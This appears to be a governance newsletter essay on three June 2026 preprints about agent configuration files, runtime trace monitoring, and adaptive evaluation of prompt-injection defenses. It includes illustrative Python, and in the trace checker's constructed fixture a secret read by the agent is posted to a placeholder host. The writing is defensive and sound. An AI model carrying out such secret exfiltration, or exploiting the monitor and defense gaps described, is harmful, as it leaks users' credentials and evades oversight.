VERIK / V044 / 26 JUN 2026
Five Categories / Governance

The Substrate Around the Agent Is the Governance Object

A single day, three independent papers, one structural recognition

On June 25, 2026, three independent research groups submitted arXiv preprints that, read together, mark a turn in how the agentic AI research community is naming the governance problem. None of the papers share authors. None cite each other. Each addresses a different layer of the deployment stack. Each, in its own framing, makes the same structural claim: the governance object is not the agent. The governance object is the substrate around the agent that has not yet been instrumented.

The three papers, in submission order, are the Madatha paper on the agent configuration file as a supply-chain artifact, the VIGIL paper on runtime enforcement over agent execution traces, and the Narisetty paper on the evaluation methodology that ranks defenses for tool-using agents.

Three layers: configuration, runtime trace, evaluation methodology. Three independent research teams. One submission day.

The pattern

For two years the conventional governance discourse has located the problem in the model. Align the model. Red-team the model. Constrain the model's outputs. Publish model cards. The frontier labs and the institutional governance frameworks (NIST AI RMF, the EU AI Act risk tiers, the CISA five categories) inherited that framing because that is where the visible artifact lived.

The June 25 slate names something different. The agent is not the only thing that has to be governed. The configuration file that creates the agent is an undeclared supply-chain artifact. The runtime trace the agent produces is the only place where multi-call behavioral violations are visible. The benchmark regime that ranks defenses is itself the surface that determines which defenses are deployed. None of these layers are the model. All of them are the substrate the model sits inside.

The Madatha paper finds that across 10,008 public repositories, 10.1 percent of tracked agent configuration paths are SHA-256 exact duplicates across independent organizations, with 75.5 percent of clone pairs crossing organizational boundaries. Fifty-eight percent of configurations are single-commit (never revised after creation). Less than 1 percent declare permission boundaries, against 33 percent for GitHub Actions workflows. The paper names this layer as a supply-chain artifact class, proposes hash-chained audit logs and an agent-configuration software bill of materials mapped to NTIA minimum elements and SLSA Build Level 2, and notes that the NIST Center for AI Standards and Innovation AI Agent Standards Initiative (February 2026) addresses identity, authorization, monitoring, and interoperability for agents but the configuration layer remains unaddressed.
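The three measurements above (exact duplicates across organizations, single-commit configurations, missing permission-boundary declarations) and the hash-chained audit log the paper proposes can be shown on a small constructed corpus. The following is an added example written for this piece, not code from the Madatha paper or from any project it measures. The repository names, file contents and commit counts are constructed sample data, and the keys treated as a permission-boundary declaration (`permissions:`, `allowed_tools:`, `scopes:`) are stand-ins, since the paper as summarized here does not list the keys it counted.

```python
"""Added example (not the Madatha paper's code): scan a constructed set of
agent configuration files for SHA-256 exact duplicates across organisations,
single-commit (never revised) files and missing permission-boundary
declarations, then record each finding in a hash-chained audit log so that
later edits to the record are detectable."""
import hashlib
import json
from collections import defaultdict

# Constructed sample corpus: (org/repo, path, file text, commits touching the path)
SAMPLE_CONFIGS = [
    ("org-a/web", "agent.yaml",
     "name: reviewer\nmodel: example-model\ntools: [shell, http]\n", 1),
    ("org-b/api", "agent.yaml",  # byte-identical copy of org-a's file, different org
     "name: reviewer\nmodel: example-model\ntools: [shell, http]\n", 1),
    ("org-a/data", ".agent/config.yaml",
     "name: etl\nmodel: example-model\ntools: [fs]\npermissions:\n  fs: read-only\n", 4),
    ("org-c/ops", "agent.yaml",
     "name: oncall\nmodel: example-model\ntools: [http]\n", 2),
]

# Assumption: these keys stand in for whatever a config uses to declare a permission boundary.
PERMISSION_KEYS = ("permissions:", "allowed_tools:", "scopes:")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan(configs):
    """Group files by content hash and collect the three per-file properties."""
    by_hash = defaultdict(list)
    single_commit, no_permissions = [], []
    for repo, path, text, commits in configs:
        label = f"{repo}:{path}"
        by_hash[sha256_hex(text)].append(label)
        if commits == 1:
            single_commit.append(label)
        if not any(key in text for key in PERMISSION_KEYS):
            no_permissions.append(label)
    duplicates, clone_pairs, cross_org_pairs = {}, 0, 0
    for digest, members in by_hash.items():
        if len(members) < 2:
            continue
        duplicates[digest] = members
        orgs = [m.split("/")[0] for m in members]  # "org-a/web:agent.yaml" -> "org-a"
        for i in range(len(members)):
            for j in range(i + 1, len(members)):
                clone_pairs += 1
                cross_org_pairs += orgs[i] != orgs[j]
    return {
        "duplicate_groups": duplicates,
        "clone_pairs": clone_pairs,
        "cross_org_clone_pairs": cross_org_pairs,
        "single_commit": single_commit,
        "no_permission_boundary": no_permissions,
    }


def append_chained(log: list, record: dict) -> dict:
    """Append an entry whose hash covers the previous entry's hash (a hash chain)."""
    prev = log[-1]["entry_hash"] if log else "0" * 64
    body = json.dumps(record, sort_keys=True)
    entry = {"prev_hash": prev, "record": record, "entry_hash": sha256_hex(prev + body)}
    log.append(entry)
    return entry


def verify_chain(log: list) -> bool:
    """Recompute every link; an edited, reordered or removed entry breaks the chain."""
    prev = "0" * 64
    for entry in log:
        if entry["prev_hash"] != prev:
            return False
        body = json.dumps(entry["record"], sort_keys=True)
        if entry["entry_hash"] != sha256_hex(prev + body):
            return False
        prev = entry["entry_hash"]
    return True


def build_audit_log(configs) -> list:
    """Run the scan and commit every finding to a fresh hash-chained log."""
    findings = scan(configs)
    log = []
    for group in findings["duplicate_groups"].values():
        append_chained(log, {"finding": "exact_duplicate", "paths": group})
    for path in findings["single_commit"]:
        append_chained(log, {"finding": "single_commit", "path": path})
    for path in findings["no_permission_boundary"]:
        append_chained(log, {"finding": "no_permission_boundary", "path": path})
    return log


if __name__ == "__main__":
    audit = build_audit_log(SAMPLE_CONFIGS)
    for entry in audit:
        print(entry["record"])
    print("chain intact:", verify_chain(audit))
```

On the constructed corpus the scan reports one duplicate group whose single clone pair crosses an organization boundary, two single-commit files and three files with no permission boundary; only the file that carries a `permissions:` block escapes the last category, which is the same contrast the paper draws between agent configurations and GitHub Actions workflows.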

The VIGIL paper builds a runtime enforcement framework that translates agent-skill behavioral specifications into satisfiability-modulo-theories constraints over finite execution traces. Single-call filters miss violations that depend on event order, argument relationships, and cross-call value flow. The framework achieves over 95 percent recall and below 10 percent false-positive rate on real agent runs. It surfaces 34 confirmed violations across deployed skill ecosystems, including one specification defect acknowledged by NVIDIA. The acknowledged defect is the first publicly disclosed instance of a frontier vendor confirming that a deployed skill specification failed under runtime trace inspection.
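The distinction the paragraph draws, between what a single-call filter can see and what only a whole-trace check can see, is easiest to show with a trace in which every call is individually permitted. The following is an added example written for this piece, not VIGIL's code: VIGIL compiles behavioral specifications to SMT constraints, whereas here the same three kinds of rule (event order, argument relationship, cross-call value flow) are written as plain Python predicates over the finished trace, which is an assumption made for illustration. The tool names, arguments and the trace itself are constructed.

```python
"""Added example (not VIGIL's code): three behavioural rules over a finite
execution trace that a per-call filter cannot express, beside the per-call
filter that passes the same trace. Tool names and events are constructed."""
from dataclasses import dataclass
from typing import Any


@dataclass
class Event:
    index: int          # position in the trace
    tool: str           # tool/skill invoked
    args: dict          # arguments passed
    result: Any = None  # value returned, if any


# What a single-call filter can check: is this tool allowed at all?
ALLOWED_TOOLS = {"read_secret", "approve_payment", "send_payment", "http_post", "backup", "delete"}


def single_call_filter(trace):
    """Violations visible one call at a time: only calls to tools outside the allow-list."""
    return [f"event {e.index}: tool {e.tool!r} not allowed" for e in trace if e.tool not in ALLOWED_TOOLS]


def rule_order(trace):
    """Event order: every delete must be preceded by a backup of the same path."""
    out = []
    for e in trace:
        if e.tool != "delete":
            continue
        backed_up = any(p.index < e.index and p.tool == "backup"
                        and p.args.get("path") == e.args.get("path") for p in trace)
        if not backed_up:
            out.append(f"event {e.index}: delete of {e.args.get('path')!r} without prior backup")
    return out


def rule_argument_relation(trace):
    """Argument relationship: a send_payment amount must not exceed the latest approve_payment limit."""
    out, limit = [], None
    for e in trace:
        if e.tool == "approve_payment":
            limit = e.args["limit"]
        elif e.tool == "send_payment" and (limit is None or e.args["amount"] > limit):
            out.append(f"event {e.index}: payment {e.args['amount']} exceeds approved limit {limit}")
    return out


def rule_value_flow(trace):
    """Cross-call value flow: a value returned by read_secret must not reach a later http_post argument."""
    out, secrets = [], {}  # secret value -> index of the call that produced it
    for e in trace:
        if e.tool == "read_secret" and e.result is not None:
            secrets[str(e.result)] = e.index
        elif e.tool == "http_post":
            for name, value in e.args.items():
                for secret, src in secrets.items():
                    if isinstance(value, str) and secret in value:
                        out.append(f"event {e.index}: http_post arg {name!r} carries value read at event {src}")
    return out


def check_trace(trace):
    """Whole-trace check: the union of the three multi-call rules."""
    return rule_order(trace) + rule_argument_relation(trace) + rule_value_flow(trace)


# Constructed trace: every call is on the allow-list, yet each rule is violated once.
SAMPLE_TRACE = [
    Event(0, "read_secret", {"name": "db_password"}, result="s3cr3t-value"),
    Event(1, "approve_payment", {"limit": 100}),
    Event(2, "send_payment", {"amount": 250, "to": "vendor"}),
    Event(3, "http_post", {"url": "https://example.invalid/log", "body": "token=s3cr3t-value"}),
    Event(4, "delete", {"path": "/data/report.csv"}),
]

if __name__ == "__main__":
    print("single-call filter:", single_call_filter(SAMPLE_TRACE) or "no violations")
    for finding in check_trace(SAMPLE_TRACE):
        print("trace check:", finding)
```

The per-call filter returns nothing for `SAMPLE_TRACE` because every tool is permitted; the trace-level check returns three findings, one per rule. Reordering events or changing an argument in one call can flip the verdict of another, which is why these properties have to be evaluated over the whole trace rather than call by call.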

The Narisetty paper addresses a higher layer: not a single defense but the evaluation methodology that ranks defenses. Every published out-of-band defense for tool-using agents (named: CaMeL, FIDES, Progent, RTBAS, FORGE) was validated only on static benchmarks. The paper points out that this is the same methodology that produced confidence in the in-band defense category until adaptive defense-aware attacks broke twelve of them at over 90 percent success rate. The paper specifies the threat model and protocol an adaptive evaluation requires. It does not claim the out-of-band defenses fail. It claims the evaluation regime under which they were judged cannot tell whether they fail.

Why the three together matter

Any one of these papers, read in isolation, looks like another contribution to the agent-security literature. Read together, they name a governance pattern the existing frameworks have not yet absorbed.

The pattern: every layer that an agent depends on, but that the agent itself does not produce, is governable infrastructure. The configuration file is not the agent. The runtime trace is not the agent. The benchmark regime is not the agent. Yet each is the substrate that determines whether the agent's behavior can be predicted, observed, or constrained. The frameworks that already govern these layers in conventional software (SBOM for supply chain, log-trace standards for runtime observability, adaptive red-team protocols for security validation) have analogues in the agent stack that are not yet specified.

The Madatha finding that less than 1 percent of agent configurations declare permission boundaries while 33 percent of GitHub Actions workflows do is the cleanest single illustration. The same engineers who declare permissions for their continuous-integration runners do not declare them for their AI agents, in the same repositories, on the same day, in adjacent files. The discipline exists at one layer of the stack and not at the other. The frameworks have not yet asked for it.

The VIGIL finding that a vendor-acknowledged specification defect was visible at runtime but not at the static-specification layer is the second illustration. The defect existed in production. The specification looked correct. The trace told a different story. The layer where the defect could be seen was the layer no governance regime currently inspects.

The Narisetty finding that the evaluation regime determines the confidence is the third. A defense category's safety claims are only as good as the protocol used to validate them. When the protocol is static and the threat is adaptive, the rank order of defenses on the leaderboard is not informative about field behavior. The mythos of safety attaches to the leaderboard, not to the field.

What the existing frameworks have specified, and what they have not

The institutional governance frameworks in force or in draft as of June 2026 have moved substantially on the agent as artifact. The NIST AI Risk Management Framework names alignment, robustness, and accountability dimensions for AI systems. The EU AI Act establishes risk tiers and transparency obligations for general-purpose AI. The CISA five categories identifies privilege, behavior, structural, accountability, and supply-chain risk classes for agentic systems. The NIST CAISI AI Agent Standards Initiative (February 2026) announces identity, authorization, monitoring, and interoperability workstreams.

None of these instruments name the agent configuration file as a regulated artifact. None require permission boundary declarations on the configuration. None require an agent-configuration software bill of materials. None specify what a runtime trace must contain to support violation detection. None specify the evaluation protocol under which an out-of-band defense must be validated before it can be claimed as a control.

This is not an indictment of the frameworks. The deployment tempo outran the instrument-writing tempo, as it has at every stage of the agentic AI cycle. The point is structural. The substrate the frameworks depend on is the substrate the frameworks have not yet specified.

What remains on the table

The agent was the visible artifact. The substrate around the agent is where the governance function has to be instrumented. The policy instruments and the deployment tempo are not aligned.